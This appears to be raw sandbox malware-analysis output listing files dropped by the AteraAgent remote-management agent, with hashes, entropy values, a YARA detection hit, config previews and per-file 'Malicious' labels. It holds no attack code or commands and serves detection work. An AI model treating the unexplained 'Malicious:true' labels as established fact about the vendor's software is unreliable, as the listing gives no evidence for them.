                                                                                                                                                                                                                                                                                                                                  SHA-512:828545952AE610221EDCD90F3B8A584BA0833B2ACDA3A2B89DA6F3A1DB7D5A2EBA0EFE407964257F144081DA544806D12305908356B4ABA3F6E1ADEE1B22E4F5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):33320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.312502771073403
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:wKg7oYtwr50jYIExIyeVuU2uEpYi60J2p:mtwr2YI6U2P7642p
                                                                                                                                                                                                                                                                                                                                  MD5:097726DA90E126FCC3202F1E386CF2F4
                                                                                                                                                                                                                                                                                                                                  SHA1:E1F8E7B0D399EC568AC2A47E41BB004D1DD2F2E0
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F95244AEE9389AD0EEE52A25F6A9ED67561F504D7EACA085BEA5BE94E12B724
                                                                                                                                                                                                                                                                                                                                  SHA-512:547B6F21E6B8767AF1F4437CC806F5388538C55F9F9269DD7880EE63D1C98785A23EE8361AE46133937D715E5F3499B073A5C0FE7AA6594AA4289C4792ABCFF5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1537
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0063120500114895
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FV0PH2/+w3VUrPH2/+789y:3sIk7O7RgdjdgFSagFsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:C3CA0AD8FE91D02044029A11A9480B1F
                                                                                                                                                                                                                                                                                                                                  SHA1:1FB4C1063460C48AC77D3D4702697A35727A5E51
                                                                                                                                                                                                                                                                                                                                  SHA-256:B2AED8BAB56D0FDBD1D6F1277A3257DFFBFD107BEB19320C0D1F4DC0E4AD3AEF
                                                                                                                                                                                                                                                                                                                                  SHA-512:50B18B6DD91CB691C8B77AB612A7172CE59881705A52F59880A29A0F81E910A61D3D4506AB53B1F945611AFE079B96A896F3F01442D3B68801B2748C68AE01F6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Diagnostics.DiagnosticSource" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAss
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXco:WB3
                                                                                                                                                                                                                                                                                                                                  MD5:0AA380D46D813D9D8760D0024B7BFF2F
                                                                                                                                                                                                                                                                                                                                  SHA1:4D7800BEE91F2C0D56D5F98698EE08E0388BBA7F
                                                                                                                                                                                                                                                                                                                                  SHA-256:0DBF6EAC2F4AF29D0CABD16A93A832C643AE41370D810A8DC86D6D835CE1B063
                                                                                                                                                                                                                                                                                                                                  SHA-512:B4A3D28CA772FA1C52F1A10CC439881A0BEC75EB59CE94FC577712632DC0D74C83AF644A3DF4337331C7F846D7E465CC2EE84106CA7A543DF1565678E90AE6CD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=29.9
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):112168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179883799509183
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:ugssVbDRgWchiMWXRIe0ZMTR8U3XTknAxb2waOn3ybQgLbYpm8GRUdokEWUpj76n:uUpviy8UHTRxrybQgLbGm8FUpjw
                                                                                                                                                                                                                                                                                                                                  MD5:C1EBDAF4F2323F9B2B227D9A4A84F35D
                                                                                                                                                                                                                                                                                                                                  SHA1:D30457F47DF07F2BFCDD782029177342ACFB0CAF
                                                                                                                                                                                                                                                                                                                                  SHA-256:58A489811FE53ACF66D1F1C76D9783CA2C1E18FC2868F8B866205F15F9CABC60
                                                                                                                                                                                                                                                                                                                                  SHA-512:D78BECAA30421F7B633F711328A6ADB260F2223CA598574FD6E72B31C97688144E8BBAD8D4693FF91DC822897A2554B1BB88B90A97A3AC7C248F747C2F1BF9AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):145448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.2029182449287
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:nRdbKQx0YYK8gwbUEA5xZs0vVV2yzlhXhYThkyFqhtuElLVwkVJe5K+Q7P6IlIhT:R9XeDmzV2yzlhKLFU1lLVp1+2flYFnQy
                                                                                                                                                                                                                                                                                                                                  MD5:9E8C2769ACE2559FDC7795FD818091D1
                                                                                                                                                                                                                                                                                                                                  SHA1:D93777BDF75D83B3B9A5908F26C7BFCFE42D874C
                                                                                                                                                                                                                                                                                                                                  SHA-256:F6DFAD2D77D0DC756D1BB7031F5B1B6AF956E8746576085AD5BE7176A8D58AAD
                                                                                                                                                                                                                                                                                                                                  SHA-512:96EF70F468DAC1FC793FDFC5E48CF92B6DE58CF96241296AA1A90B4B5E3550A78C8AD27255A835BF0E3C7621CEF3D09658D5F0277D43A8067E1239B9A382BA27
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.308769507327884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:uINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgg:nNsii6v/HS0+OJd5gpKm76tgg
                                                                                                                                                                                                                                                                                                                                  MD5:4B1A1E928652EB3F0133D9FE87E6F510
                                                                                                                                                                                                                                                                                                                                  SHA1:D3EEF0BC8753998334446BBB6C506AB93AA96632
                                                                                                                                                                                                                                                                                                                                  SHA-256:BBCC3629B80B18FC2C594B91B938F92DCA78A3075D1CC6D86BCC402C165807B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:1A28F870B2CDC17958D78235A7CF327398807B5F12A237135C5FFC3D64314F0D240BBBE1864EB9C390973F312B197568FACD7024D303D33DE6C49BF483271015
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):29224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.671527172322904
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:8mYaXzmSJL6guJrdvc5tIZmQCaBj4QU3hOTVTDvAGvoOCcdcOFyF606Nyb8E9VFa:ASJh5tIYQzT5zyF60aEpYi60yb
                                                                                                                                                                                                                                                                                                                                  MD5:BF60A5DB36CC3351FD33C1F5CF71F430
                                                                                                                                                                                                                                                                                                                                  SHA1:DBA4BB0833128FB36CB59D7693DE1AF8B2856239
                                                                                                                                                                                                                                                                                                                                  SHA-256:264C8A254022ACEB099CF17AD0D250FA1E25348BFCC345093A195D41C2462E52
                                                                                                                                                                                                                                                                                                                                  SHA-512:26A9CBA97DEAAEEFE0E6016A12DD20A652DAC5E28FDBD4A75C8760A1FC4A9D32E81ACD35C0C064414B8F343AF340001D6BC6F91132B3D26AC0402964E9060182
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):219176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.062860378962767
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:QYq80gPJle2CpcKyudA1+PVtMG8e7sw9CcHvhlO6:QYqqbe2CSod5dtM8ww7P5
                                                                                                                                                                                                                                                                                                                                  MD5:434418DE0D309B514788C355CB46513A
                                                                                                                                                                                                                                                                                                                                  SHA1:6769AF03EA9A137CB86FDB6949D054D41FDFA61D
                                                                                                                                                                                                                                                                                                                                  SHA-256:D7DAD051E962913D8B561B2ADB497D4BA9090CD5CB2140CB24DDF7C087BDD51D
                                                                                                                                                                                                                                                                                                                                  SHA-512:D346CC9A28BF9EAE1F11DDFA9570972F4F4B0101B6D6A020F37521183E6AE19FCEB065D842EBE9EC6CB871654053E6D79ECD02E1DF24DB20468212A4AAA5C010
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):302120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.177209507230591
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:JZ6n5mx115y505H0jIfJMSFk9X0jIfJMSFk9j:XKwJMykwwJMykj
                                                                                                                                                                                                                                                                                                                                  MD5:7B3B0711FC558FCCF1BAD9057BD459D3
                                                                                                                                                                                                                                                                                                                                  SHA1:D9630F792577953D4DBB7FB40779928FF20044E0
                                                                                                                                                                                                                                                                                                                                  SHA-256:0C2ED61F9A5961E94C4430D0A44457331BF0EB27B610CB9ACE9DB60F622AA861
                                                                                                                                                                                                                                                                                                                                  SHA-512:8A35D5E9D9DFE994CA930D627361111A6DA860759EEAAF2ECCA9D15E54981408DC32DB719B58629239348620035F37A86C953A9458B26E1810712F74396B3587
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0141792226861375
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:MMHdGzNFF7ap+5v5OXrRf/2//FicYo4xT:JduPF7NhOXrRH2/d9y
                                                                                                                                                                                                                                                                                                                                  MD5:8F6EB9E75E6A6F0C0D58FB697C10CEDF
                                                                                                                                                                                                                                                                                                                                  SHA1:6944935DFDC33E0C6DB26869BF25EDA85A2622D8
                                                                                                                                                                                                                                                                                                                                  SHA-256:E2B8677434501735FB0233ED0CC2FFEE5BF6FB4387C51DBCB2585A70E42E4F08
                                                                                                                                                                                                                                                                                                                                  SHA-512:A946252B2E3705EAE751A2672D4ADE1499ECEB28C48B4BE6150C4201EE20A7B9A4450C75E06B07F5DAA3528041A566931D988FBD0C2EA90240D61008895BA44A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.030153597507431
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:A1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7st:fIzm6pOIgvr74
                                                                                                                                                                                                                                                                                                                                  MD5:9D4A969B8B2C87AD7CEECEA0503FA835
                                                                                                                                                                                                                                                                                                                                  SHA1:9455C372B101F8EC50C26FCD3B7B23CC55456504
                                                                                                                                                                                                                                                                                                                                  SHA-256:EAE380E7C489AE01EF90388017DA03461343F28C64EDEF90F5A69668B9357213
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7C5941BFDC5E1D361899DA6C7879BD7D93B8CF020CE799EDB5982B05249039F014214BCDE163D4DE85D5B6313A8BDABA0E38326A1B722F247066A58E5C04B3B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.134343250444765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:njS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvO:n+e55LgIkTmyAAfTnMLvO
                                                                                                                                                                                                                                                                                                                                  MD5:209D8DA754B1C4231EDA61FF1273303F
                                                                                                                                                                                                                                                                                                                                  SHA1:2AEAD94EB934F6C826210EFF3D70D3656D0EE856
                                                                                                                                                                                                                                                                                                                                  SHA-256:4BE923D58770E34C8CD87E4B49F059E94ACA820EF9FB7B2D5FB52947560EB9A6
                                                                                                                                                                                                                                                                                                                                  SHA-512:B17BB121C3AB9D8F90E74C5576C009A9E1DF7BACF6CD4C802D8CF346A2A5F50B9A9DF04E0AB8BBB16DDABC2D65B7892D2BDB8C6B72C06CF213C387ACFFB120DC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960710164548092
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:+Bja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTU+:+Bjk38WuBcAbwoA/BkjSHXP36RMGn
                                                                                                                                                                                                                                                                                                                                  MD5:4CC2FAC21717C1A7BE8C5D835E563DCC
                                                                                                                                                                                                                                                                                                                                  SHA1:127E5C78F95AE42F9E79116D012D7346836C4AD0
                                                                                                                                                                                                                                                                                                                                  SHA-256:7F874FE9B0660202C7B46AA6B986713CD4C0A8505F5B7E318A0DDF9AB6B925F5
                                                                                                                                                                                                                                                                                                                                  SHA-512:9D1E26244A9701BA759D55B080F5D4DE0AA70569C21888AB30C5DE4237C46B63995717693349F6E0FF63E6DE7F0A86F4414E06C30C307D97E93F3C6D702BE931
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):154664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.990628902751052
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Y4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otHA3e:Y4wZywKn/U5xEwKIk0WB
                                                                                                                                                                                                                                                                                                                                  MD5:9AA88CE7FC21DBAFEB50D7F9015E0C5E
                                                                                                                                                                                                                                                                                                                                  SHA1:831C6815F9B6BEE06C5F40A1BF8941BB8D998090
                                                                                                                                                                                                                                                                                                                                  SHA-256:D59F20EBE0E9D42926152D7247A71991DC92D15261AC7232DF9AA245AE6938B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:6FDAA814FDA3AC901AD7251497E60DF8B627E028F6FCE99BFD91C559E0C29FA8D0C34F1BC381BEF3C8BB1823307ADA528CC415627F14C004ED821948F052D8BB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6712317871537605
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:VrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAFvL:VrMcXP64LEpYi60I
                                                                                                                                                                                                                                                                                                                                  MD5:3F7903882577EA2DDE5E44812EC5C581
                                                                                                                                                                                                                                                                                                                                  SHA1:CB95380833FE6A8BCC81731760BFBED8D75F1039
                                                                                                                                                                                                                                                                                                                                  SHA-256:F453F99E09E3D00FF38F5255E3429C62253975C3E9A3DF7BE27884823F7BB107
                                                                                                                                                                                                                                                                                                                                  SHA-512:480DD34D1D86CBA5A025D32DF49B6C1AEBD05A096F482753AD12B10FE52DBAA87E20AEE35FA9F49E50D730DB7394400E1D32E66C67B3C5A190F1412481543C49
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):420392
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.109370194605785
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:05douWvsWkOfjL/MEd6/7vfA8SCW1nFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFl:0pjblhW1F
                                                                                                                                                                                                                                                                                                                                  MD5:7DA58F372D44CD35C2EE6EE65A790D8F
                                                                                                                                                                                                                                                                                                                                  SHA1:C1E165ECFD14FEFBD8BF3D2354F62168D2A83E71
                                                                                                                                                                                                                                                                                                                                  SHA-256:4CE48CC85CF820727954BDE51F19B9CAE86A98E33DF6F7E6120137A3C0A20402
                                                                                                                                                                                                                                                                                                                                  SHA-512:88D53764E64838191B9CA77CCC22C3CBB48AD7235AA0C6E37428A4D77A595E541B0329699F1415885FE78D4BADCD2F77A7097F2A014FB21FE9B7B0E8CBBCF826
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.266474436775497
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:HYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zS6:HKC9niwOepJ6TJPeb6NIUFg76KzS6
                                                                                                                                                                                                                                                                                                                                  MD5:1614C01C7C3CE47BD4D69F4BD1182A0A
                                                                                                                                                                                                                                                                                                                                  SHA1:0C848F1D040D5B7C6A8825821641AD7F16DF10A2
                                                                                                                                                                                                                                                                                                                                  SHA-256:9F8A4ED710DB570124AF15A05A7119C18A67BFA8F5D381DFC7F495AD1626384F
                                                                                                                                                                                                                                                                                                                                  SHA-512:E75999B1C2E2A9C1AB61B5152B051A79B063F7E03AC0AC4C43325F6324BF13E59949501B995A32C63572707DE600A110BA57BFD1AF3AB47774A3D51A37C1E499
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):142376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.160595508804938
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:oUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlq0:DBFd3/aFs2h
                                                                                                                                                                                                                                                                                                                                  MD5:E00BB3C6EBBB9F175C18CA590577A313
                                                                                                                                                                                                                                                                                                                                  SHA1:A31434A65F3CC12164625A7976686BA219668E43
                                                                                                                                                                                                                                                                                                                                  SHA-256:F15B44ABEE072714B034B4F5AD0E204A27DEC0657E82F2474C2DE1BB73487B49
                                                                                                                                                                                                                                                                                                                                  SHA-512:C173B95EA158AECC185454D1E4DBDCB8F43BE3558082D57DB65EE98813D9872D9D0820FB19A562631FE7F908BFA8AAFE391EA539C2C61479D19B435EF93E6C33
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):110120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.511348043938725
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:dPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76W:dWw0SUUKBM8aOUiiGw7qa9tK/Ybh
                                                                                                                                                                                                                                                                                                                                  MD5:FCEEAAF25388DD233DB2BF03A8DB43ED
                                                                                                                                                                                                                                                                                                                                  SHA1:C2BC2D57CEBD9BE3B4F8EDA7656BB9EEE93E7C00
                                                                                                                                                                                                                                                                                                                                  SHA-256:0C4E97521C178BEC6C9A28BDA0A84858127CF3986A9F9090091A122CC9E116B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:308DFEDD4FF7C1C9F8878D5997D51D9A6BE777EE9FD327BE915049E8F762B5ED0237DC7553A9DE8FE4BD98E3E76B07B41AEBAE6A5CCA183EF350D75B7024AA05
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.67311343166089
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Nh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeBbg:Ny9gpEpYi60Ac
                                                                                                                                                                                                                                                                                                                                  MD5:432E994CC9F82D38F3D438521AC8E3D9
                                                                                                                                                                                                                                                                                                                                  SHA1:8BF7F19AC04FC1E92F58E998AC6EAE451E4F67D8
                                                                                                                                                                                                                                                                                                                                  SHA-256:D5743DAC849AE08419FECB0C1DF0F68980AA0E24645EEE315B20114D6F96ADEB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AF539F6F164EC5C06B6846CC6448A768AEF5DAC9CD51703885E6B56C83E62F5D6E2FC9F9B54EB3FB9CA1195957B73D269433436063401434A7E12704D6F681F4
